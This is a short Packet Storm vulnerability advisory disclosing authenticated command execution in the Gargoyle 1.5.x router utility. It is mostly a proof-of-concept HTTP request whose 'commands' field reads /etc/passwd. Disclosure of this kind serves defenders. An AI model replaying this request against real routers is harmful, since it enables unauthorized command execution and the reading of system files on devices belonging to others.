Gargoyle 1.5.x Command Execution

2015-06-04T00:00:00
ID PACKETSTORM:132149
Type packetstorm
Reporter Provensec
Modified 2015-06-04T00:00:00

Description

                                        
                                            `# Affected software: Gargoyle router management utility  
# Type of vulnerability:code execution  
# URL:http://www.gargoyle-router.com/  
# Discovered by: provensec  
# Website: provensec.com  
  
#version:1.5.X (Built 20140215-1506 git@505e8dc)  
# Proof of concept  
  
  
vulnerable paramter= "commands"'  
  
POST /utility/run_commands.sh HTTP/1.1  
Host: 192.168.1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101  
Firefox/38.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.1/time.sh  
Cookie: browser_time=1433405406;  
hash=090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64;  
exp=1433406276  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: multipart/form-data; boundary=--------108192589  
Content-Length: 418  
  
----------108192589  
Content-Disposition: form-data; name="commands"  
  
  
*cat/etc/passwd*  
----------108192589  
Content-Disposition: form-data; name="hash"  
  
090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64  
----------108192589--  
  
##screenshot for output: http://prntscr.com/7ckcqd  
  
  
and yes it requires authentiction  
`